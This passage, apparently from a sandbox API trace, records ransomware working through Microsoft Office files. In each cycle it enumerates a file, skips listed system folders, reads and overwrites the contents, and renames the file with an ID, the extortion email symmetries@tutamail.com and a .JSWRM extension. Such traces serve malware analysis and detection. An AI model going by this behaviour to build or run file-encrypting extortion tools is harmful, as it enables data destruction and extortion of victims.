Size=0xa0) returned 0x23d530 [0121.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0121.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0121.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0121.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0121.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0121.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0121.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0121.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0121.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0121.380] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINEG_COL.HXT", cAlternateFileName="SKYPEF~4.HXT")) returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2=".") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="..") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="...") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="windows") returned -1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="recovery") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="perflogs") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="documents and settings") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="system volume information") returned -1 [0121.380] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_COL.HXT", lpString2="msocache") returned 1 [0121.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXT", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0121.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXT", cchWideChar=23, lpMultiByteStr=0x241218, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_COL.HXT", lpUsedDefaultChar=0x0) returned 23 [0121.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXT", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0121.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_COL.HXT", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_COL.HXT", lpUsedDefaultChar=0x0) returned 23 [0121.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0121.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0121.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0121.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.381] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=215) returned 1 [0121.381] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0121.381] ReadFile (in: hFile=0x238, lpBuffer=0x22e358, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22e358*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0121.382] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.382] WriteFile (in: hFile=0x238, lpBuffer=0x22e358*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22e358*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0121.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0121.383] CloseHandle (hObject=0x238) returned 1 [0121.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0121.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0121.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0121.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0121.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0121.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0121.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0121.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0121.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0121.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0121.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0121.384] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINEG_F_COL.HXK", cAlternateFileName="SK7EA9~1.HXK")) returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2=".") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="..") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="...") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="windows") returned -1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="recovery") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="perflogs") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="documents and settings") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="system volume information") returned -1 [0121.384] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_F_COL.HXK", lpString2="msocache") returned 1 [0121.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0121.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_F_COL.HXK", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0121.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0121.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_F_COL.HXK", cchWideChar=25, lpMultiByteStr=0x241290, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_F_COL.HXK", lpUsedDefaultChar=0x0) returned 25 [0121.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0121.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0121.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_F_COL.HXK", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0121.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0121.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_F_COL.HXK", cchWideChar=25, lpMultiByteStr=0x240fe8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_F_COL.HXK", lpUsedDefaultChar=0x0) returned 25 [0121.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0121.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0121.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0121.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0121.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.385] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0121.385] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0121.386] ReadFile (in: hFile=0x238, lpBuffer=0x2093c8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.386] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.386] WriteFile (in: hFile=0x238, lpBuffer=0x2093c8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2093c8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0121.387] CloseHandle (hObject=0x238) returned 1 [0121.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0121.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0121.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0121.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0121.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0121.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0121.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.387] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0121.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0121.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0121.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0121.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0121.388] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINEG_K_COL.HXK", cAlternateFileName="SK002E~1.HXK")) returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2=".") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="..") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="...") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="windows") returned -1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="recovery") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="perflogs") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="documents and settings") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="system volume information") returned -1 [0121.388] lstrcmpiW (lpString1="SKYPEFB_ONLINEG_K_COL.HXK", lpString2="msocache") returned 1 [0121.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0121.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_K_COL.HXK", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0121.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0121.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_K_COL.HXK", cchWideChar=25, lpMultiByteStr=0x241330, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_K_COL.HXK", lpUsedDefaultChar=0x0) returned 25 [0121.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0121.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0121.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_K_COL.HXK", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0121.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0121.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINEG_K_COL.HXK", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINEG_K_COL.HXK", lpUsedDefaultChar=0x0) returned 25 [0121.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0121.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0121.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0121.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0121.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINEG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_onlineg_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.389] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0121.389] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0121.389] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.391] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 